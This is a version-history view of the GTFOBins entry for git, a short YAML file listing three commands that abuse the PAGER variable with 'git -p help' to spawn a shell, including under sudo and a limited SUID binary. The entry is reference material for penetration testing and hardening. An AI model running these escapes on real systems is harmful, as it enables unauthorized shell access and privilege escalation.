GTFOBins.github.io/_gtfobins/git.md

10 lines
221 B
Markdown
Raw Normal View History

2018-07-22 13:06:54 +00:00
---
functions:
2018-10-05 17:55:38 +00:00
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
2018-10-05 17:55:38 +00:00
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
2018-10-05 17:55:38 +00:00
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
2018-07-22 13:06:54 +00:00
---